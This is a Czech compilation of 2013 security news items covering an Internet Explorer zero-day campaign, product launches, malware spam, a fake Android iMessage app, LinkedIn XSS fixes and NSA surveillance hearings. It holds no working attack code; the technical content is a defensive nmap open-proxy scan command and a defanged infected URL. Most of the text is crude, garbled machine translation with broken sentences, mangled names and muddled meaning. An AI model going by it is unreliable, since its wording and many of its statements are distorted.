Výpadek národní kritické infrastruktury, která je zničující dost vynutit hrozbou aktéři přehodnotit sílu kybernetických útoků. Cyber zbraních nemohou zastavit používání kybernetických útoků. Ochrana osobních údajů obavy z hranolu lze omezit vládou dotovaných kybernetických útoků ve Spojených státech a po celém světě. Noví aktéři na scéně Cyber, nejvíce pozoruhodně, Brazílie, Polska a Tchaj-wanu. Větší důraz na rozvoj úniky metody, které obcházejí detekci. "Kybernetický útok, při pohledu mimo jeho geopolitickém kontextu, umožňuje velmi malý manévrovací prostor pro právní bránící státu," profesor Thomas Wingfield z Marshall Center. "Falešnou vlajkou operace a samotná povaha internetu, aby taktické přiznání ztrácející hra. Nicméně, strategické uveďte autora - fusing všechny zdroje inteligence na potenciální hrozbu - umožňuje mnohem vyšší míru důvěry a více možností pro rozhodovatele. A strategické atribuce začíná a končí geopolitické analýzy. "
Nejnovější IE 0-day stále unpatched napadá využití je vrátit tři měsíce 30. září 2013. Zranitelnosti | Bezpečnost | Hacking Zatímco Microsoft je ještě vydat patch pro nejnovější Internet Explorer zero-day (CVE-2013-3893), zprávy přicházejí v tom, že chyba byla využívána ve větší míře a po delší dobu, než se původně věřilo.
Microsoft uznal existenci zranitelnosti a jeho aktivní využívání začátkem tohoto měsíce, a vydala Fix je nástroj pro zmírnění nebezpečí, dokud náplast může být propuštěn. Od té doby, FireEye vědci mají svázané útoky na čínské hackerské skupiny, která zasáhla Bit9 dříve v tomto roce, a mají společné, že kampaň ("Operace DeputyDog") byla zaměřena na japonských organizací a začal 19. srpna, nejpozději. Potom ve čtvrtek vědci z obou AlienVault a Websense uvolnit svá zjištění ohledně využití použít. Researcher Jaime Blasco říká, že si všimli, že se pořádá na subdoméně vlády Tchaj-wanu systému e-nákupu, a zjistil, že návštěvníci, kteří navštívili hlavní stránku poprvé, bude okamžitě přesměrován na Exploit stránku a podáváme s škodlivého souboru. ale ne všichni návštěvníci byli zaměřeni -. jen ty, jejichž systém Windows XP nebo Windows 7 systémy byly / jsou spuštěny v angličtině, čínštině, francouzštině, němčině, japonštině, ruštině, korejštině a portugalštině a používat Internet Explorer 8 nebo 9 Alex Watson potvrdil Tchaj-wan připojení. "Naše ThreatSeeker Intelligence Cloud hlášeny potenciální oběť organizace v Tchaj-wan se snaží komunikovat s příslušnou škodlivým velení a řízení serveru jako daleká záda jako 01.07.2013. Jedná C & C komunikací předcházely široce oznámenou první použití tohoto útoku infrastruktury o více než šest týdnů, a naznačuje, že útoky vůči této hrozbě herce není omezen jen do Japonska, "řekl sdílené . "Websense Threat Intelligence naznačuje, že hrozba herecké útoky nebyly omezeny pouze na Japonsku bylo oznámeno dříve. Použití samostatných IP adres , registrace domén, a permutace na kapátkem místech naznačuje vysokou segmentací mezi útoky a různé týmy, které používají stejné sady nástrojů, které využívá, a C & C infrastrukturu, "dodal.
Průměrná on-line bankovní účet je přístupný 2,4 unikátní zařízení 30. září 2013. Zabezpečení | Mobil Průměrný počet zařízení zákazníků používá pro přístup k online účetnictví - včetně osobních počítačů, pracovních počítače, smartphony a tablety -. Bankovními klienty, kteří se na první místo pro většinu používaných zařízení každý měsíc ThreatMetrix Světový svěřenecký Intelligence Network (Síť) zachycuje více než 500 milionů návštěvníků, přes více než 1900 zákazníků a 9000 webových stránek a využívá prediktivní analytiku rozlišovat mezi legitimní a podvodné chování, osobností a zařízení. V nedávném snímku od 1. května do 31. července 2013 Síť zjištěno, že průměrná on-line bankovní účet je přístupný 2,4 jedinečné zařízení. Údaje byly zpracovány přes různorodý soubor odvětví - včetně bankovnictví, e-commerce, podnikání, pojištění, sociální sítě, státní správy a zdravotnictví -., A zjistil, že bankovní účty jsou přístupné výrazně vyšším počtem unikátních zařízení, než v jiných sektorech v červenci 2013, údaje ukazují, že 55 procent z bankovních účtů jsou přístupné z jednoho přístroje, je 26 procent přístupné dvěma zařízeními, jsou o 11 procent přístupné tři zařízení, a 4 procenta jsou přístupné čtyři zařízení. Zatímco tam je významný pokles-off po čtyřech zařízeních, údaje ukazují velmi malé procento účtů byla přístupná tolik jako dvacet zařízení ve lhůtě jednoho měsíce, což vyvolává nějaké červené vlajky. Oproti bankovnictví, všechna průmyslová odvětví a analyzoval pořad výrazně nižší počet unikátních zařízení na účet. Ve stejném období tří měsíců od 1. května do 31. července, to vše se odvětví přístupné v průměru o 1,79 zařízení na účet, v porovnání s bankovními účty byla přístupná zařízení 2,4 v průměru. Podle údajů z července 2013, 68 procent účty ve všech odvětvích jsou přístupné pouze jedno zařízení každý měsíc, jsou o 19 procent přístupné dvěma zařízeními a 7 procent jsou přístupné tři zařízení. Po třech zařízeních, údaje ukazují výrazný pokles off. Zatímco většina on-line podnikání určení počtu zařízení přístup účty cookies, které identifikují uživatele činnost na webových prohlížečích, to není nejpřesnější způsob, jak identifikovat jedinečné zařízení. Kvůli anonymní prohlížení režimů a obecných znalostí smazání cookie, rozpoznání specifických Zařízení takto metody ukazují vyšší počet zařízení, protože každé nové uživatele vymazání souborů cookie, počítají se jako nové zařízení při návratu do webové stránky. ThreatMetrix přezkoumání všech přihlašovacích údajů účtu v průběhu tří měsíců - od 1. května do 31. července 2013. Přihlášení byly přezkoumány bez zachycení identifikační údaje k určení počtu jedinečných identifikátorů zařízení spojených s šifrovanou hodnotu účtu. Počet unikátních zařízení byla stanovena počítáním jedinečných zařízení otisků prstů (SmartID) za přihlášení. Organizace byly rozděleny do různých širších kategorií pro srovnání: bankovnictví, maloobchod a další.
Chraňte vysoké hodnoty transakcí na iOS a Android 30. září 2013. Mobil | OS | Zabezpečení SecureKey představila svůj rozšířené cloud-based briidge.net Připojte multi-faktorovou autentizaci služby. Tato nejnovější verze briidge.net Connect zahrnuje novou briidge.net Connect Mobile SDK, které umožňuje vývojářům snadno přidávat robustní multi-faktorovou autentizaci do funkce iOS a Android mobilních aplikací.
S Connect SDK mohou vývojáři vložit schopnosti jako QuickCode zabezpečené PIN a nula-touch zařízení autentizace do aplikací s vysokou přidanou hodnotou, jako je retailové bankovnictví, mobilní platby, obsah objednání, sociálních médií a dalších, což zjednodušuje uživatelský komfort a snižuje uživatelskou správu hesel zátěž pro poskytovatele služeb. SecureKey software-jediné řešení je modeled po hardwarového bezpečnostního prvku a používá stejné standardní GlobalPlatform bezpečnostní protokoly, aby zajistily, že každý přístroj může být jednoznačně identifikovány a ověřeny briidge.net Připojte Service pomocí out-of-band kanál. Nová Connect SDK nabízí všudypřítomné silné zabezpečení pro všechny mobilní aplikace pro Android a iOS platformy, včetně nového iPhone 5S a 5C zařízení, a poskytuje bezproblémový přechod do hardwarového zabezpečení. Se zvýšenou mobilní bezpečnostní aplikace, mohou poskytovatelé služeb zavést další služby s vysokou přidanou hodnotou, přilákat více zákazníků a získat konkurenční výhodu. briidge.net Connect Service zahrnuje rovněž briidge.net Connect Mobile App - ke stažení z iTunes a Google Play App Obchody- který podporuje single-click, out-of-band webové ověřování na mobilních zařízeních pro jednoduché a bezpečné online účtu přihlašovacích údajů a transakce konfirmací. Jak Connect SDK ke stažení Connect mobilní aplikace zaměstnanosti briidge.net DNA technologie poskytují jedinečné ID zařízení pro širokou škálu aplikací podporovaných službou briidge.net Connect. SecureKey briidge.net DNA technologie je již zakotvena v Intel IPT-dát notebooky, počítače a Ultrabooks dodávané spotřebitelům od roku 2012. Tím, že poskytuje spolehlivé unikátní ID zařízení přes mobilní platformy, Connect SDK umožňuje vývojářům vytvářet mobilní aplikace s jednotnou zařízení na bázi ověřování. To také umožňuje připojit briidge.net služby, které mají být použity v kombinaci se stávajícím třetích stran, na platformě specifických řešení zařízení otisky prstů jako součást celkového rizika na základě ověření systému. Nová QuickCode rys v Connect SDK umožňuje organizacím nahradit těžké k typu jména a hesla ve svých mobilních aplikací se rychle, snadno vstoupit serveru ověřený PIN. Silnější než jeden mobilní app PIN nebo online heslem, uživatel QuickCode působí jako multi-zařízení PIN - synchronizovaný napříč všemi uživatele zapsaných zařízení, které poskytují konzistentní zážitek přes zařízení, které používají pro přístup ke službám. "Musíme se dostat zbavit hesel. Potřebujeme silný multi-faktor autentizace pro většinu internetových a mobilních případech transakcí použití. Vzhledem k tomu, kapaliny ohrožení životního prostředí a naší vlastní průmyslu se vyvíjející technologie krajina, klientský software a cloud-based služeb přístup může poskytnout silnou autentizaci, kterou potřebujeme a nezbytnou pružnost reagovat na nové požadavky, "řekl George Peabody, ředitel s Glenbrook partnery. "Koncových zařízení, oblačnosti, a bezpečnostní hardware bude kaše vstříc řadu autentizačních potřeb. SecureKey Schopnosti spojit ty uzly v transakci řetězce. "
Cyberoam uvádí na trh novou generaci firewallu spotřebiče 30. září 2013. Zabezpečení | Ochrana Cyberoam představila nové generace firewallů (NGFW) v jeho NG řady spotřebičů. Cyberoam NGFW přijít Layer 8 Identity-Based technologie pro žalovatelné inteligencí a ovládací prvky, které nabízejí kompletní zajištění kontroly nad L2-L8 pro budoucnost připraven bezpečnosti v podnicích. Cyberoam Next-Generation Firewall ochrana EAL4 + certifikovaný a nabízí vrstvy 8 Identity-Based zabezpečení, Aplikace viditelnost a ovládání, Intrusion Prevention System, webové stránky filtrace, HTTPS inspekce, VPN (IPSec a SSL) a granulované pásma kontroly. Další bezpečnostní funkce, jako je Firewall webových aplikací, Gateway Anti-Virus, Gateway Anti-Spam a více, jsou také k dispozici. mobilizace pracovních sil vedla k poptávce po kdykoliv-kdekoliv přístup k síťovým prostředkům. To, spolu s rostoucím počtem uživatelů, jako zákazníky a partnery se připojují k podnikové síti z vnějšku vede k de-perimeterization podnikových sítí. . Kromě toho, trendy, jako je nárůst počtu uživatelů sítě a zařízení, aplikací výbuchem, virtualizace a další vedou ke ztrátě bezpečnostních kontrolách podniků prostřednictvím jejich sítí, dnes podniky hledají řešení, která zajistí nejlepší z obou světů - příští generace sítí bezpečnost a rychlejší výkon sítě s flexibilním připojením. Jak se investovat do schopností, jako NGFWs, chtějí sklízet maximální obchodní přínosy a dlouhodobý význam pro jejich IT a síťové ekosystému. Cyberoam NGFWs odpovídajícím způsobem řešit tuto potřebu tím, že poskytuje vysoký výkon a propustnost flexibilní I / O sloty, které umožňují další měď / vlákniny 1G/10G porty (XP) na svých FLEXI port (XP) bezpečnostních zařízení. Navíc Cyberoam je Extensible bezpečnostní architektura pomáhá podnikům řešit neznámé hrozby budoucnosti tím, že nabízí flexibilitu pro prodloužení životnosti a výkonu svých NGFW spotřebičů podporovat novější funkce podnikového zabezpečení a vylepšení. Kromě Extensible bezpečnostní architekturu, která podporuje budoucí potřeby bezpečnosti stejném zařízení, mohou podniky také přidat další zařízení v clusteru / HA podporovat větší počet uživatelů v jejich sítích.
Počítačoví zločinci využívají nejvíce novinek v rámci 22 hodin 29.9.2013 Kriminalita | Hacking
Počítačoví zločinci i nadále reagovat rychlostí blesku, když vidí příležitost využít národní nebo globální reportáž šířit malware. Ve skutečnosti zločinci vymýšlejí "Breaking News", který se zdá se vztahují k high-profil aktuálních událostí. Commtouch Security Lab neustále analyzes škodlivých kampaní, které využívají nejnovější zprávy pomocí názvu CNN a dalších významných zpravodajské nalákat příjemce e-mailu na nebezpečné stránky. Průměrná doba mezi skutečnou skutečné události, a jeho využívání pohybuje kolem 22 hodin během posledních tří měsíců. V pátek 6. září malware distributoři vymysleli falešné zprávy určené využít veřejného zájmu na možnost amerického náletu proti Sýrii. E-maily použité na předmět, "Spojené státy začaly bombardovat" a byly vytvořeny tak, aby se jako legitimní CNN news upozornění. Je to příklad cybercriminal komunity využitím zájem a úzkost o aktuálním dění, jak zvýšit úspěšnost svých škodlivých kampaní. Před Sýrie související Například průměrný čas zahájení útoku viru již klesá. V březnu roku 2013, kdy byl zvolen nový papež, první malware a phishing útoky začal po 55 hodin. V dubnu 2013 po bombardování Bostonský maraton, to trvalo 27 hodin vidět první související útoky využívající zájem o akci. Mezi další příklady patří novorozence královské dítě a zprávy o oznamovatelů NSA Edward Snowdena. Ale příklady, jako je nedávné Sýrie související kampaň v září ukazují, že spammeři nebudou čekat - jsou čím dál "rychleji" než samotné události.
Nástroje pro prohlížení infikované webové stránky 29.9.2013 Hacking | Nástroje
Na ISC jsme měli ve své dnešní zprávě od Grega o obfuscated JavaScriptu na stránkách hxxp :/ / fishieldcorp.com /. Malý průzkum ukázal, že tento web byl napaden v minulosti. Nic mimořádného, jen další běh infekce mlýna stránkách.
Co stávka mě je, jak se povaha tohoto výzkumu se v posledních letech změnila. Není to tak dávno mimo kontrolu potenciálně infikovaného webové stránky by měly zúčastněné VM nebo kozího stroje a hodně trpělivosti a pokusů a omylů. V současné době existuje mnoho stránek, které budou dělat základy pro vás. Greg nám poslal odkaz na URLQuery , který zobrazuje spoustu informací o internetových stránkách, včetně skutečnosti, že tento člověk je nakažený.
Jsem stále stát fanouškem Sucuri pro tento typ výzkumu. Jako URLQuery Sucuri najde tento web infikován.
Sucuri také poskytuje některé další detaily, které jsou zajímavé. Výpis kódu JavaScriptu:
V tomto případě je to, co většina zaujalo mě, že tato černá listina stav na internetových stránkách.
V době mé recenzi se infekce stále vyzvednout různých Blacklist webových stránkách. Mezi dobou jsem tuto obrazovku, a když jsem skončil tento deník, SiteAdvisor si ji zvedl a budu předpokládat, že ostatní budou následovat v těsném závěsu.
Rozhodně jednodušší než v minulosti. Teď najít nějaký čas na tom pracovat JavaScript.
Ještě nemáte perimetru sítě zajištěny proti stažení škodlivý obsah?
29.9.2013 Bezpečnost | Zabezpečení
Profesionálové informační bezpečnosti brát velmi vážně perimetru sítě a snaží se zavést několik zařízení vynutit řízení přístupu k síťovým prostředkům, jako jsou firewally, IPS, filtrování obsahu, včetně zařízení, antimalware funkčnosti a řízení přístupu k síti. Ale existují dva konkrétní proměnné, které mohou značnému zvýšení rizika externích kompromisů:
Administrátorská práva ve stolních počítačích: Mnoho druhů podnikového softwaru nemají zavedený princip vyžaduje alespoň oprávnění. To nám, proč se významné procento privilegií firem správce grantu pro uživatele, kde je jejich použití není sledován v detailu. Ovládání USB zařízení: Mnoho společností s výhradou dodržení předpisů neumožňuje využití USB portů vůbec. Nicméně, tyto společnosti jsou malé procento z celkového vesmíru a zbývající nejsou ochotni provádět nepopulární opatření. Zvažte následující scénář: Společnosti s PC přistupuje přes oficiální přístup k internetu a podnikových notebooků s 4G přístup:
Mohou nastat okolnosti, kdy CISO může být opravdu nepopulární, jako den, kdy se na oficiální země fotbalový tým hraje rozhodující zápas. Samozřejmě, že oficiální internetové připojení neumožňují přístup k proudu, a tak se lidé najít "alternativní způsoby, jak" k přístupu. Protože ne příliš mnoho lidí zná pojem výchozí brány a jak to změnit v počítači aniž by samy o sobě samo, odmítnutí služby, je velmi zajímavý program s názvem delegát , který je víceúčelový server proxy a bude fit pro potřebu vynechání přístupu k internetu. Vzhledem k tomu, že je velmi podrobný Příklady použití stránky , mohou lidé začít používat bez dalšího obtížnosti.
Většina lidí v podnikové síti jsou si vědomi, že "proxy parametr" existují, tak je to pro ně velmi snadné změnit a užívat si "výhody" volných-z-omezení internetu.
Jak můžete říct, pokud máte "free proxy" uvnitř vaší síti, které používají ilustrovaný scénář? nmap má plugin, který je schopen kontrolovat otevřená proxy. Chcete-li zkontrolovat otevřená proxy vnitřní sítě 192.168.0.0/24, můžete vydat příkaz nmap - script http-open-proxy.nse 192.168.0.0/24. Následující obrázek ukazuje příklad výsledek projednávané situaci:
Určitě byste měli oddělit administrátorská práva pro uživatele a rovněž zakázat používání 3G an 4G zařízení při připojení do firemní sítě. Pokud nemáte nástroje pro to, měli byste sledovat využití pro oprávněními správce daných uživatelů.
Zprávy zadarmo nadchly i kyberzločince. Internetem šíří nebezpečnou aplikaci
29.9.2013 Mobil | Bezpečnost Kdo by rád neušetřil nějakou tu korunu? I proto je nejspíše tolik oblíbená funkce iMessage, díky které si mohou lidé s operačním systémem iOS od společnosti Apple zdarma posílat zprávy. Zneužít tuto popularitu se ale nyní snaží kyberzločinci a internetem šíří nebezpečnou aplikaci nazývanou iMessage, jež je určena pro operační systém Android. Aplikace iMessage pro Android
Aplikace iMessage se objevila na několika webových stránkách, které distribuují programy pro počítačové tablety a chytré telefony s operačním systémem Android. Dokonce byla i v oficiálním internetovém obchodu Play.
Jak upozornil server Security Affairs, aplikace skutečně umožňovala posílat zprávy zdarma, a to nejen na přístroje s Androidem, ale i na konkurenční platformu iOS. Díky tomu si ji jen během pár dní stáhlo více než 10 000 lidí z různých koutů světa.
Ten, kdo podobnou aplikaci naprogramoval, moc dobře věděl, co dělá. vývojář programů pro mobilní přístroje Steven Smith Problém je ale v tom, že všechny zprávy, které lidé s touto aplikací odešlou nebo přijmou, jsou přeposílány na servery umístěné v Číně. Autoři a správci aplikace se tak velmi snadno mohou dostat ke všem zprávám, byť jsou na servery nahrávány v zašifrované podobě.
„Ten kdo podobnou aplikaci naprogramoval, moc dobře věděl, co dělá. Pro uživatele to představuje obrovské bezpečnostní riziko,“ konstatoval vývojář programů pro mobilní přístroje Steven Smith.
Podle něj totiž lidé považují zprávy oprávněně za soukromé a nedotknutelné. Neostýchají se prostřednictvím nich posílat nejrůznější přihlašovací údaje nebo i lechtivé osobní materiály, což samozřejmě počítačovým pirátům nahrává.
Smith zároveň podotkl, že iMessage je pouze špičkou ledovce a podobných aplikací koluje internetem daleko více. Uživatelé by jejich riziko neměli rozhodně podceňovat, vhodné je podle něj stahovat programy výhradně z oficiálních a ověřených zdrojů.
Volání i SMS zadarmo Funkci iMessage nabízí společnost Apple majitelům iPhonů, iPadů a iPodů již druhým rokem zdarma. Díky ní si lidé mohou posílat mezi sebou obrázky i text zadarmo, podobně jako v případě klasických SMS a MMS zpráv.
iMessage Apple iMessage na iPhonu
S příchodem iOS7 navíc nabídl americký počítačový gigant uživatelům i volání zadarmo – díky funkci FaceTime Audio. Novinka pracuje podobně jako například konkurenční Skype od Microsoftu. I ten je možné na přístrojích od Applu používat, ale FaceTime Audio je integrován přímo do systému a díky tomu je daleko chytřejší.
Není potřeba spouštět žádnou další aplikaci, jednoduše stačí jít do seznamu kontaktů a tam vybrat požadovanou osobu. Hovor se uskuteční stejně, jako kdyby jej zprostředkovával operátor.
LinkedIn záplaty Více XSS zranitelnosti 28.9.2013 Zranitelnosti | Sociální sítě Profesionální sociální síť LinkedIn je citlivý na čtyři odráží v cross-site scripting (XSS) zranitelnost, před vydáním opravu těchto chyb přes léto.
XSS zranitelnosti patří mezi nejčastější chyby on-line. V tomto případě by útočník mohl potenciálně využít LinkedIn uživatelům tím, že napíchne HTML nebo kód skriptu do svého prohlížeče, aby se krást uživatele cookie, podle umístění na Plný seznam zpřístupnění e-mailové .
Po úspěšném využívání problém, mohl by útočník pak poslat phishingových e-mailů kreslení nic netušící uživatele na klon webu nakazit oběti stroj s malwarem, nebo ukrást tohoto uživatele přihlašovací údaje.
První chyba je zneužitelná písemně upraveného HTML do "Sdílet aktualizace ..." pole na domovské stránce LinkedIn. Druhý a třetí XSS chybu Podobně lze provádět při návštěvě "Skupiny Možná vás bude zajímat v" sekci "skupiny" stránku. Kdysi tam, by útočník muset najít otevřenou skupinu a zahájit diskusi vložením více speciálně vytvořený kód do pole na této stránce před sdílení diskusi. Poslední chyba existuje na "skupiny", str. stejně. Nicméně, tohle je zneužít vytvořením skupiny, pak Vytvoření hlasování v rámci této skupiny vložení škodlivého kódu do pole pro vytvoření hlasování.
Eduardo Garcia Melia o ISEC Partners odhalila nedostatky v prosinci 2012. Podle Full Disclosure LinkedIn pevně problémy někdy v červenci 2013 a Melia předložila zranitelnosti zprávu Full Disclosure včera.
Threatpost natáhl LinkedIn potvrdit, že společnost je bezpečnostní tým byl skutečně vyřešen chyby ale nebyly k dispozici k připomínkování v době zveřejnění.
LinkedIn propaguje sebe jako největší světový profesionální sítě, se může pochlubit více než 238 milionů uživatelů po celém světě.
Profesní síť udělal dojem na začátku tohoto měsíce s odvoláním na zahraniční soudu Intelligence Surveillance , mlčenlivý soudu odpovědné za regulaci hodně z Národní bezpečnostní agentury špionáže úsilí , žádat, aby mu bylo dovoleno zveřejnit údaje o počtu národní bezpečnosti dopisů it obdrží.
NSA ředitel Grilovaná O sběru dat umístění buňky 28.9.2013 Špionáž | Zákony celltowerNSA ŘEDITEL GRILOVANÁ O SBĚRU DAT UMÍSTĚNÍ BUŇKY Věděli jsme slyšeli další botu k poklesu v sáze dozoru NSA?
Včera před slyšení Senátu zpravodajského výboru, senátor Ron Wyden, D-Oregon, položil několik otázek špičaté ředitel NSA generál Keith Alexander regarding zda by se agentura shromažďuje data buňky věže ve kterém se nacházíte kromě metadat z volání mobilních telefonů. Tyto informace používá vymáhání práva při vyšetřování s rozkazu, by pomohlo špionážní US agentura určit fyzické umístění předmětů vyšetřování.
Alexander pohyboval kolem toho, co znělo jako řečnickou otázku se senátorem, se skladem odpověď, která zahraniční zpravodajské Surveillance Soudní příkaz by byl vyžadován v případě, že vláda nepřeje buněk informace o serveru jako součást hromadného sběru mobil záznamů.
"Já nechci udělat, je dát v nespecifikované formě vše, co je tajné," řekl Alexander.
S příslibem dalších úniků pocházejících z mezipaměti dokumentů odcizených bývalý dodavatel NSA Edward Snowdena, byl senátor Wyden ke škodě dalšího zveřejnění zatočíme?
Wyden oživil v grilování Alexander včera. Byl zahájen na jeho otázky týkající se sběru dat mobilních stránek s monologem nadávat NSA a zpravodajské komunity, že nejsem dopředu o dohledu od samého počátku.
"Postavil jsi inteligence systému sběru oklamal Američany opakovaně. Čas od času, byli Američané řekli jednu věc o domácí dohledu na veřejných fórech, zatímco vládní agentury dělal něco jiného, "řekl Wyden. "To je ztráta důvěry, které nemohou být obnovena."
Senát Výbor pro zpravodajskou činnost má dohled nad federální zpravodajské činnosti, a velký počet členů agitoval pro udržení NSA schopnost udržet naživu dozorové činnosti ve jménu národní bezpečnosti a zmaření teroristických činností. Zatímco argumenty pro a proti zůstal věrný strany vedení pro nejvíce se rozdělit, to byl většinou přátelský oheň pro Alexandera a ředitel Národní zpravodajské služby Jamese Clapper .
Senátor Dan Coats, R-Indiana, nabádal média na to, jak to bylo hlásil, skandál, volat to "znepokojující", že i přes odtajněné informace poskytované na veřejných fórech, analýzy v médiích nebylo vždy přesné, podle jeho názoru.
"Byli jsme frustrovaní na boj proti populární příběh," řekl Klapka. "Udělali jsme nějaké řízení rizik tím, že otevře jak jen to půjde, uznává význam transparentnosti a význam pro obnovení důvěry amerického lidu."
Že transparentnost, srdce zvonu řekl také prospívá americké protivníky.
"Chodí do školy na to taky," řekl Klapka. "Podstatnější je, že pokud nebudeme mít důvěru Američanů, pak to všechno je k ničemu. Snažili jsme se chybovat na straně transparentnosti a otevřenosti, ale tam jsou rizika tady. "
Alexander, který mluvil minulý týden na summitu Cybersecurity Billington ve Washingtonu, s odvoláním na útocích z 11. září na několika příležitostech, a zopakoval, že se zpravodajská komunita nebyla schopna sbírat hromadné mobil záznamy prostřednictvím § 215 PATRIOT Act, Amerika by utrpěla další teroristický útok s, protože.
"Americký lid nemají fórum, kde můžeme mít utajované diskusi. Nemůžeme prozradit informace, které máme, "řekl Alexander. "Máme proces nastaven tak, aby přinést informace do Kongresu a soudy se a sdílet s FBI a jít po špatných lidí, kteří chtějí dělat nám ublížit. Mnohem raději bych sedět tu dnes obhajovat to, co děláme, než být tady říkám, proč se nám nepodařilo pospojovat znovu. "
Mezitím Wyden a Colorado demokrat senátor Mark Udall tlačil účet předtím, než zákonodárce nazývá inteligence dohledu a dozoru nad Reform Act , který by reformovat kontrolní činnost a zakázat hromadný sběr mobilních dat. To je vedena souběžně s jiným zákona předložený senátní vyšetřovací křeslo výboru senátor Dianne Feinstein, D-Calif., A senátor Saxby Chambliss, R-Ga., Která by navrhla reformy, ale zachovat NSA schopnost shromažďovat telefonní záznamy na zahraniční cíle a Američané.
"Roste, bipartisan sentiment v Coloradu a po celé zemi, že způsob, NSA a naše zpravodajské agentury vyvážení Američanů práva na soukromí a naše bezpečnost je zásadně v nepořádku. Musíme ukončit NSA sbírku miliony nevinných Američanů soukromé telefonní záznamy a soustředit se na podstatu problému: teroristy a špiony, "Udall uvedl v tiskové zprávě oznamující účet. "To nejsou vágní nebo abstraktní ohrožení naší svobody. Tyto zátah vyhledávání se dějí právě teď. Jsem hrdý na to, aby vedl tuto bipartisan tlak na ochranu soukromí Američanů práv a zajistí, že naše snaha o zabezpečení nemají šlapat naše ústavní svobody. "
Wyden Bill by vytvořit samostatný advokát, který by mohl namítnout proti vládě v tajném cizího soudu Intelligence Surveillance, vláda je obecně jediný argumentovat před soudem, Wyden Bill říká. Zákon by také zakázat zpravodajskou komunitu z vedení neoprávněným vyhledávání pro mobilní e-mail a údajů o Američany.
Feinstein, mezitím řekl domácí sbírka metadat se nerovná dohled a argumentoval, že NSA byly aktivity legální. Její zákona je snaha zvýšit vnímání programu NSA. Její návrh zákona bude vyžadovat NSA veřejně hlásit jak často přístup k jeho databázi metadat volání a zkrátit jak dlouho jsou data uložena. Feinstein řekla, že její návrh zákona by také dát ředitele NSA před senátem pro potvrzení.
V současné době, na NSA sběrný stále pokračuje a další Snowden úniky se očekává. Alexander řekl výboru, když zeptal se, že neexistuje žádný horní limit na počet záznamů NSA mohou shromažďovat a že američtí lidé by měli věřit dohledu a požadavky vyplývající NSA jednotky se musí zavázat, aby se přístup a zkoumat data, která je shromážděná.
"Věřím, že je v nejlepším zájmu národa, aby všechny telefonní záznamy na skříňce, takže můžeme hledat pokud to bude zapotřebí, ano," řekl Alexander.
Zaměstnanci NSA špehují své blízké
28.9.2013 Špionáž Kromě české vojenské rozvědky se špehováním příbuzných zabývá i NSA. Podle tvrzení představitelů americké výzvědné služby však šlo „pouze“ o 12 případů od roku 2003. Které byly prokázány. Zatím.
Podle dopisu NSA určenému senátoru Grassleymu zneužívali zaměstnanci prostředků agentury, když na vlastní pěst špehovali své „nevěrné“ partnery. Senátor od inspektora Ellarda si senátor nenechal pro sebe a uvolnil ho k veřejnému otištění. Podle dopisu došlo k celkem 12 „závažným případům“ zneužití prostředků určených ke špehování na americkém území.
O tomto nekalém jednání zaměstnanců NSA se již hovoří delší dobu, například deník Wall Street Journal v srpnu psal o „rozsáhlých prostředcích používaných ke špehování blízkých osob“, ale tehdy ředitel NSA generál Keith Alexander prohlásil, že „údajné důkazy o tisících případů porušení soukromí“ jsou nepravdivé a zavádějící.
„Podle nezávislého inspektora NSA došlo během posledních 10 let ke 12 závažným případům zneužití prostředků agentury pro soukromé účely jejích zaměstnanců – v podstatě jeden ročně,“ vysvětloval Alexander před senátním výborem. „Několik z těchto případů bylo předáno Ministerstvu spravedlnosti k případnému soudnímu stíhání, v jiných případech byli zaměstnanci náležitě potrestáni kázeňsky. Všechno jsme řešili, jakmile jsme se o tom dozvěděli,“ dodal ředitel.
Mezi případy citovanými v dopise senátorovi je i jeden zaměstnanec, který v letech 1998 až 2003 odposlouchával devět telefonních čísel devíti žen, které nejsou občanky USA bez „opodstatněného důvodu zahraničního šetření“. Poslouchal zejména hovory směřující do zahraničí. Ve dvou případech špehoval i americké občanky.
Další zaměstnanec v roce 2004 zkusil „ze zvědavosti“ prověřit domácí telefonní linku své přítelkyně, která není americkou občankou. I když mu systém ve sběru těchto údajů bránil, podařilo se mu získat metadata o telefonních hovorech své přítelkyně.
NSA nyní například musí vysvětlovat, proč prováděla hromadný odposlech zákazníků telefonní sítě Verizon nebo proč měla přístup v reálném čase k serverům několika poskytovatelů, což ovšem příslušné společnosti popírají. Všechny tyto případy vynesla na světlo bývalý zaměstnanec Edward Snowden, který se v současnosti skrývá v Rusku.
Spear phishing , je vytvořit novou éru počítačové trestné činnosti , podle Chris Dixon , partner firmy rizikového kapitálu Andreesen Horowitz - a z hlediska ohrožení podniku , je to srovnatelné s "super kmene bakterií. "
Ve video rozhovoru s Business Insider , pan Dixon řekl, že nová vlna " cílených útoků " bylo důsledkem zločineckých organizací s velkými rozpočty , a že jejich útoky byly velmi těžké se bránit .
" Jak snadné je přijít na náš e-mail svého šéfa ?" Řekl Dixon : "Tak . Naše obrana se spoléhal na hledání podpisů a vzory - to nebude fungovat . Máme super - kmen bakterií. "
" Intenzita se dramaticky zvýšila . Protože tyto zločinecké [ ] organizace jsou dobře financovány , jsou vytváření vlastních útoků , " řekl Dixon . " V osmdesátých letech , když si přečtete o " hacking " , bylo to děti , vandalové baví . Stává se opravdu, ale opravdu vážně problemMy pocit mám od mluvit s mnoha lidmi v oblasti obchodu, a může být pravda výrazně více , než veřejnost uvědomuje . "
ESET návod, jak rozpoznat a vypořádat se s phishingových e-mailů - dokonce i ty zaměřené specificky na vaší organizaci - lze nalézt zde .
ESET výzkumný pracovník Stephen Cobb argumentujeŽijeme Security příspěvek, který více vzdělávání je klíčem , říká: " Více Cybersecurity školení je zapotřebí , a nyní potřebujeme !"
High- profil Nedávné útoky , jako incident , ve kterém byl New York Times hlavnou znetvořil sezobrazí zpráva " Syrská armáda byla Electronic tady" se spoléhal na phishingových e-mailů .
" Spear phishing " e-maily - je zaměřena na určité lidi - byli posláni do společnosti v Indii,IT dodavatele , který pracuje pro společnost v Austrálii , Melbourne IT , což pro sebe registrováno Doménové názvy pro New York Times,The Huffington Post UK a Twitter .
" To je to, co se stalo s RSA ," říká Dixon . "Je to osobní útok - a to je velmi , velmi časté. Mluvil jsem s mnoha entreprneurs . Jsme technologie investoři , kupujeme do nově zakládaných podniků , které mají potenciální řešení. Možná, že musíme mít koordinaci mezi vládami a podniky. "
V blogu na jeho "Nové podvody E a varování " stránka, FBI Internet Crime centrum stížnosti varovala, že v letošním roce "FBI zaznamenala nárůst zločinců, kteří používají kopí phishingové útoky cílit různých průmyslových odvětví . Hackeři cílové oběti kvůli jejich zapojení do průmyslu nebo organizace , které chtějí dělat kompromisy. "
